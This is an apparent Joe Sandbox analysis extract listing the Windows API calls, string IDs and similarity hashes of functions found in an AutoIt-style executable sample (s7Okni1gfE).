                                            • GetParent.USER32 ref: 0083BAE3
                                            • GetClassNameW.USER32(00000000,?,00000100), ref: 0083BAF8
                                            • _wcscmp.LIBCMT ref: 0083BB0A
                                            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0083BB85
                                            Strings
                                            Similarity
                                            • API ID: ClassMessageNameParentSend_wcscmp
                                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                            • API String ID: 1704125052-3381328864
                                            • Opcode ID: 547f0c2a20c9d1cab8c4d901d76ffff7c8ac1d3bf49a1e46ab93d5db50f61467
                                            • Instruction ID: e32d3cb71f58d724e3d5bb6c65d5c093840597d992f87a0c4c6fef843b7d2a82
                                            • Opcode Fuzzy Hash: 547f0c2a20c9d1cab8c4d901d76ffff7c8ac1d3bf49a1e46ab93d5db50f61467
                                            • Instruction Fuzzy Hash: 99110AB664C317FAFA206628EC17DA6B79CFF61334F200011FA14E51D6FF6568514594
                                            APIs
                                            • VariantInit.OLEAUT32(?), ref: 0085B2D5
                                            • CoInitialize.OLE32(00000000), ref: 0085B302
                                            • CoUninitialize.OLE32 ref: 0085B30C
                                            • GetRunningObjectTable.OLE32(00000000,?), ref: 0085B40C
                                            • SetErrorMode.KERNEL32(00000001,00000029), ref: 0085B539
                                            • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 0085B56D
                                            • CoGetObject.OLE32(?,00000000,0088D91C,?), ref: 0085B590
                                            • SetErrorMode.KERNEL32(00000000), ref: 0085B5A3
                                            • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0085B623
                                            • VariantClear.OLEAUT32(0088D91C), ref: 0085B633
                                            Similarity
                                            • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                            • String ID:
                                            • API String ID: 2395222682-0
                                            • Opcode ID: 86a61ae5d0a617a3c71d3fa3d9e15cd265efd1c764bab7f65b4906c9e5c489f8
                                            • Instruction ID: 65ef1e0d712f876b1b37f7cd38bd047f57ad1146f3c04eb77ce272fc0cd18a3e
                                            • Opcode Fuzzy Hash: 86a61ae5d0a617a3c71d3fa3d9e15cd265efd1c764bab7f65b4906c9e5c489f8
                                            • Instruction Fuzzy Hash: D3C11271608305AFC704EF68C88496ABBE9FF98349F00491DF98ADB251DB71ED09CB52
                                            APIs
                                            • __swprintf.LIBCMT ref: 008467FD
                                            • __swprintf.LIBCMT ref: 0084680A
                                              • Part of subcall function 0082172B: __woutput_l.LIBCMT ref: 00821784
                                            • FindResourceW.KERNEL32(?,?,0000000E), ref: 00846834
                                            • LoadResource.KERNEL32(?,00000000), ref: 00846840
                                            • LockResource.KERNEL32(00000000), ref: 0084684D
                                            • FindResourceW.KERNEL32(?,?,00000003), ref: 0084686D
                                            • LoadResource.KERNEL32(?,00000000), ref: 0084687F
                                            • SizeofResource.KERNEL32(?,00000000), ref: 0084688E
                                            • LockResource.KERNEL32(?), ref: 0084689A
                                            • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 008468F9
                                            Similarity
                                            • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                            • String ID:
                                            • API String ID: 1433390588-0
                                            • Opcode ID: ea7595d897cc1b17f2e58e5324019c2db8aaabe2b0067444751939f68044bb4c
                                            • Instruction ID: 630ca46cf6af3ea26d74240bc455ef6ceb471067b3d2e2c7fb799fd3ea42c0a1
                                            • Opcode Fuzzy Hash: ea7595d897cc1b17f2e58e5324019c2db8aaabe2b0067444751939f68044bb4c
                                            • Instruction Fuzzy Hash: 35316E7190021EABDF119F60ED59EBABBA8FF09341B104425F912E2191E734E961DB61
                                            APIs
                                            • GetCurrentThreadId.KERNEL32 ref: 00844047
                                            • GetForegroundWindow.USER32(00000000,?,?,?,?,?,008430A5,?,00000001), ref: 0084405B
                                            • GetWindowThreadProcessId.USER32(00000000), ref: 00844062
                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,008430A5,?,00000001), ref: 00844071
                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 00844083
                                            • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,008430A5,?,00000001), ref: 0084409C
                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,008430A5,?,00000001), ref: 008440AE
                                            • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,008430A5,?,00000001), ref: 008440F3
                                            • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,008430A5,?,00000001), ref: 00844108
                                            • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,008430A5,?,00000001), ref: 00844113
                                            Similarity
                                            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                            • String ID:
                                            • API String ID: 2156557900-0
                                            • Opcode ID: 1b775e97c386a54628200eaec8a9eaae88eceafbb34d5bca9016dbe6661d4fec
                                            • Instruction ID: 7895c9a005a591489ba34878613b5a39d921d3b530c46dfde9b0dd44f3fb4a7d
                                            • Opcode Fuzzy Hash: 1b775e97c386a54628200eaec8a9eaae88eceafbb34d5bca9016dbe6661d4fec
                                            • Instruction Fuzzy Hash: 64316071500208AFDB10EF58DC89FAD77BAFB68351F10D116F906E6291DBB4DE818BA4
                                            APIs
                                            • GetSysColor.USER32(00000008), ref: 0081B496
                                            • SetTextColor.GDI32(?,000000FF), ref: 0081B4A0
                                            • SetBkMode.GDI32(?,00000001), ref: 0081B4B5
                                            • GetStockObject.GDI32(00000005), ref: 0081B4BD
                                            • GetClientRect.USER32(?), ref: 0087DD63
                                            • SendMessageW.USER32(?,00001328,00000000,?), ref: 0087DD7A
                                            • GetWindowDC.USER32(?), ref: 0087DD86
                                            • GetPixel.GDI32(00000000,?,?), ref: 0087DD95
                                            • ReleaseDC.USER32(?,00000000), ref: 0087DDA7
                                            • GetSysColor.USER32(00000005), ref: 0087DDC5
                                            Similarity
                                            • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                            • String ID:
                                            • API String ID: 3430376129-0
                                            • Opcode ID: 6beb7920c88e0a53055c4c2cacf51064ccb885d67a27dd9806b464a8858839c1
                                            • Instruction ID: d1589397e6114b678c30ee99a2ecbb4b463a0548e88c71be096b1702a60c5da4
                                            • Opcode Fuzzy Hash: 6beb7920c88e0a53055c4c2cacf51064ccb885d67a27dd9806b464a8858839c1
                                            • Instruction Fuzzy Hash: E1114C31500305EFDB216BA8EC48FE97BB5FF15325F108665FA6AD50E2DB314981DB20
                                            APIs
                                            • EnumChildWindows.USER32(?,0083CF50), ref: 0083CE90
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: ChildEnumWindows
                                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                            • API String ID: 3555792229-1603158881
                                            • Opcode ID: 103c7a954278f29c14d43cdf0983764f39e6cad1ed7689736fade2055c803d83
                                            • Instruction ID: 7c91e2e281ca8b66a7c514e331e460b01001a7ae8a0177966135accd530fb4b2
                                            • Opcode Fuzzy Hash: 103c7a954278f29c14d43cdf0983764f39e6cad1ed7689736fade2055c803d83
                                            • Instruction Fuzzy Hash: 1D91B43060020A9BCB58EFA4C881BEAFB75FF44314F508519E959F7291DF30699ACBD1
                                            APIs
                                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 008030DC
                                            • CoUninitialize.OLE32(?,00000000), ref: 00803181
                                            • UnregisterHotKey.USER32(?), ref: 008032A9
                                            • DestroyWindow.USER32(?), ref: 00875079
                                            • FreeLibrary.KERNEL32(?), ref: 008750F8
                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00875125
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                            • String ID: close all
                                            • API String ID: 469580280-3243417748
                                            • Opcode ID: a0c11a77210f1c6c0581757023d95ea6deb787a7689e4a895559b966a56a6764
                                            • Instruction ID: 7bce0a5a3489e68598a60cbb3e796e593e7c1812ae6631cf31571f2f0f092634
                                            • Opcode Fuzzy Hash: a0c11a77210f1c6c0581757023d95ea6deb787a7689e4a895559b966a56a6764
                                            • Instruction Fuzzy Hash: 62915A70200606DFC745EF18CC96A68F3A8FF14305F5482A9E50AE72A2DF30AE66CF55
                                            APIs
                                            • SetWindowLongW.USER32(?,000000EB), ref: 0081CC15
                                              • Part of subcall function 0081CCCD: GetClientRect.USER32(?,?), ref: 0081CCF6
                                              • Part of subcall function 0081CCCD: GetWindowRect.USER32(?,?), ref: 0081CD37
                                              • Part of subcall function 0081CCCD: ScreenToClient.USER32(?,?), ref: 0081CD5F
                                            • GetDC.USER32 ref: 0087D137
                                            • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0087D14A
                                            • SelectObject.GDI32(00000000,00000000), ref: 0087D158
                                            • SelectObject.GDI32(00000000,00000000), ref: 0087D16D
                                            • ReleaseDC.USER32(?,00000000), ref: 0087D175
                                            • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0087D200
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                            • String ID: U
                                            • API String ID: 4009187628-3372436214
                                            • Opcode ID: 8f63d490e90be70fbb6badbbab3ea1c537a3ae2a9aeed74c98a402c79162c8ea
                                            • Instruction ID: 1cb90d0796643ea41da6bddee1caab45f2b9d38c09cfc980d02c2890e17e687f
                                            • Opcode Fuzzy Hash: 8f63d490e90be70fbb6badbbab3ea1c537a3ae2a9aeed74c98a402c79162c8ea
                                            • Instruction Fuzzy Hash: 5971C030500309DFCF219F68C885AEA7BB5FF59324F148269ED59DA2AAD731CC81DB60
                                            APIs
                                              • Part of subcall function 0081B34E: GetWindowLongW.USER32(?,000000EB), ref: 0081B35F
                                              • Part of subcall function 0081B63C: GetCursorPos.USER32(000000FF), ref: 0081B64F
                                              • Part of subcall function 0081B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0081B66C
                                              • Part of subcall function 0081B63C: GetAsyncKeyState.USER32(00000001), ref: 0081B691
                                              • Part of subcall function 0081B63C: GetAsyncKeyState.USER32(00000002), ref: 0081B69F
                                            • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 0086ED3C
                                            • ImageList_EndDrag.COMCTL32 ref: 0086ED42
                                            • ReleaseCapture.USER32 ref: 0086ED48
                                            • SetWindowTextW.USER32(?,00000000), ref: 0086EDF0
                                            • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0086EE03
                                            • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 0086EEDC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                            • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                            • API String ID: 1924731296-2107944366
                                            • Opcode ID: b193b92e0371db531f776bacc755377b8c4ae45059ff059302bcd9bc3c88f345
                                            • Instruction ID: ae3378d63cee1c2be5c7dc2fa3992fbe5e3316a7ac429193baab4698578d006e
                                            • Opcode Fuzzy Hash: b193b92e0371db531f776bacc755377b8c4ae45059ff059302bcd9bc3c88f345
                                            • Instruction Fuzzy Hash: 5E51A974204300AFDB00EF28DC9AFAA77E8FB98704F004A1DF995972E2DB719954CB52
                                            APIs
                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 008545FF
                                            • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0085462B
                                            • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0085466D
                                            • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00854682
                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0085468F
                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 008546BF
                                            • InternetCloseHandle.WININET(00000000), ref: 00854706
                                              • Part of subcall function 00855052: GetLastError.KERNEL32(?,?,008543CC,00000000,00000000,00000001), ref: 00855067
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                            • String ID:
                                            • API String ID: 1241431887-3916222277
                                            • Opcode ID: 8a13ee01cfdf349b4b561b2a7b43f912b4c79f065538ff19cb0997c04c1a8b7b
                                            • Instruction ID: 607d3f196f20e1c0657ccf2465544dd058deec2fc4922ca42d453828968a621e
                                            • Opcode Fuzzy Hash: 8a13ee01cfdf349b4b561b2a7b43f912b4c79f065538ff19cb0997c04c1a8b7b
                                            • Instruction Fuzzy Hash: 8D418CB1501209BFEB119F54CC89FBB77ACFF1931AF005016FE05DA185E7B099888BA4
                                            APIs
                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0089DC00), ref: 0085B715
                                            • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0089DC00), ref: 0085B749
                                            • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0085B8C1
                                            • SysFreeString.OLEAUT32(?), ref: 0085B8EB
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                            • String ID:
                                            • API String ID: 560350794-0
                                            • Opcode ID: 550a1f429840b4eb8d658bf4d17cfcde6628e0db278246c6261af2e58c25f521
                                            • Instruction ID: ac2953f9392780a3631a54990a34296e6527dd95865cd488bec187db56c07778
                                            • Opcode Fuzzy Hash: 550a1f429840b4eb8d658bf4d17cfcde6628e0db278246c6261af2e58c25f521
                                            • Instruction Fuzzy Hash: B8F10675A00219EFCB04DF94C884EAEBBB9FF59316F108599F905EB250DB31AE49CB50
                                            APIs
                                            • _memset.LIBCMT ref: 008624F5
                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00862688
                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 008626AC
                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 008626EC
                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0086270E
                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0086286F
                                            • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 008628A1
                                            • CloseHandle.KERNEL32(?), ref: 008628D0
                                            • CloseHandle.KERNEL32(?), ref: 00862947
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                            • String ID:
                                            • API String ID: 4090791747-0
                                            • Opcode ID: 5aee5da762199c65e4775eb5c87ce8756f520a54d8b9df4bd2eb3dc78bcd3f40
                                            • Instruction ID: a8badd6c514c21c7c02311e0d69c162faeaf1f34aa5dfe44cd7a692ce32337ed
                                            • Opcode Fuzzy Hash: 5aee5da762199c65e4775eb5c87ce8756f520a54d8b9df4bd2eb3dc78bcd3f40
                                            • Instruction Fuzzy Hash: DDD17E316047019FCB14EF28C891A6ABBE5FF84314F15859DF999DB2A2DB31EC40CB52
                                            APIs
                                            • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0086B3F4
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: InvalidateRect
                                            • String ID:
                                            • API String ID: 634782764-0
                                            • Opcode ID: 334de32cca41d15c47e298996b77706f0ebe72669d6f4d53ed493c69d9bf8384
                                            • Instruction ID: 3256c3ae7dc3086e4c56a6c7d3462462e6d305ca8e7f5ff726cc5d1d1433a83c
                                            • Opcode Fuzzy Hash: 334de32cca41d15c47e298996b77706f0ebe72669d6f4d53ed493c69d9bf8384
                                            • Instruction Fuzzy Hash: 8D517D31600208BAEF219B688D89FA97BA9FB0531CF664125F615D63E2DB71E9C0CB51
                                            APIs
                                            • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0087DB1B
                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0087DB3C
                                            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0087DB51
                                            • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0087DB6E
                                            • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0087DB95
                                            • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0081A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0087DBA0
                                            • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0087DBBD
                                            • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0081A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0087DBC8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Icon$DestroyExtractImageLoadMessageSend
                                            • String ID:
                                            • API String ID: 1268354404-0
                                            • Opcode ID: 5a253d25e8dca2c5782c2969bd3fe229c9f806e40ff3e179c482b1bf5c154555
                                            • Instruction ID: 53a064a2bf0a203d0968e2f8d499bff4937a6566c82fb57625573bda2d0a2bab
                                            • Opcode Fuzzy Hash: 5a253d25e8dca2c5782c2969bd3fe229c9f806e40ff3e179c482b1bf5c154555
                                            • Instruction Fuzzy Hash: 9C515470600308AFDB24DF68CC81FAA77B9FF58364F104529F94ADA2D1D7B0E9909B51
                                            APIs
                                              • Part of subcall function 00846EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00845FA6,?), ref: 00846ED8
                                              • Part of subcall function 00846EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00845FA6,?), ref: 00846EF1
                                              • Part of subcall function 008472CB: GetFileAttributesW.KERNEL32(?,00846019), ref: 008472CC
                                            • lstrcmpiW.KERNEL32(?,?), ref: 008475CA
                                            • _wcscmp.LIBCMT ref: 008475E2
                                            • MoveFileW.KERNEL32(?,?), ref: 008475FB
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                            • String ID:
                                            • API String ID: 793581249-0
                                            • Opcode ID: 724f38d1e156081ff8cb90ee02f752a9054dfb94e04f0f4d1c722cd8cd894c1a
                                            • Instruction ID: ff9ace3bdb5a9842400b924c3549061847edcf68a1696f1d512900e8991c4c10
                                            • Opcode Fuzzy Hash: 724f38d1e156081ff8cb90ee02f752a9054dfb94e04f0f4d1c722cd8cd894c1a
                                            • Instruction Fuzzy Hash: C1510FB2A0922D9ADF60EB98E8459DE73BCFF18310B5040AAF605E3141EB7496C5CF65
                                            APIs
                                            • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0087DAD1,00000004,00000000,00000000), ref: 0081EAEB
                                            • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,0087DAD1,00000004,00000000,00000000), ref: 0081EB32
                                            • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,0087DAD1,00000004,00000000,00000000), ref: 0087DC86
                                            • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0087DAD1,00000004,00000000,00000000), ref: 0087DCF2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: ShowWindow
                                            • String ID:
                                            • API String ID: 1268545403-0
                                            • Opcode ID: de02d3ec819cb2cc41c816f73afd620ae42d812a0509d1bbbb32d60de631ad80
                                            • Instruction ID: b661be79c14a0c1aee8219fae345c613453ac03602eed2954da7fbb09c80ebb7
                                            • Opcode Fuzzy Hash: de02d3ec819cb2cc41c816f73afd620ae42d812a0509d1bbbb32d60de631ad80
                                            • Instruction Fuzzy Hash: 4A41C57120D3849AD7395728CD8DEAA7BBEFF91324F194409F84BE66A1D670B8C0D711
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0083AEF1,00000B00,?,?), ref: 0083B26C
                                            • HeapAlloc.KERNEL32(00000000,?,0083AEF1,00000B00,?,?), ref: 0083B273
                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0083AEF1,00000B00,?,?), ref: 0083B288
                                            • GetCurrentProcess.KERNEL32(?,00000000,?,0083AEF1,00000B00,?,?), ref: 0083B290
                                            • DuplicateHandle.KERNEL32(00000000,?,0083AEF1,00000B00,?,?), ref: 0083B293
                                            • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0083AEF1,00000B00,?,?), ref: 0083B2A3
                                            • GetCurrentProcess.KERNEL32(0083AEF1,00000000,?,0083AEF1,00000B00,?,?), ref: 0083B2AB
                                            • DuplicateHandle.KERNEL32(00000000,?,0083AEF1,00000B00,?,?), ref: 0083B2AE
                                            • CreateThread.KERNEL32(00000000,00000000,0083B2D4,00000000,00000000,00000000), ref: 0083B2C8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
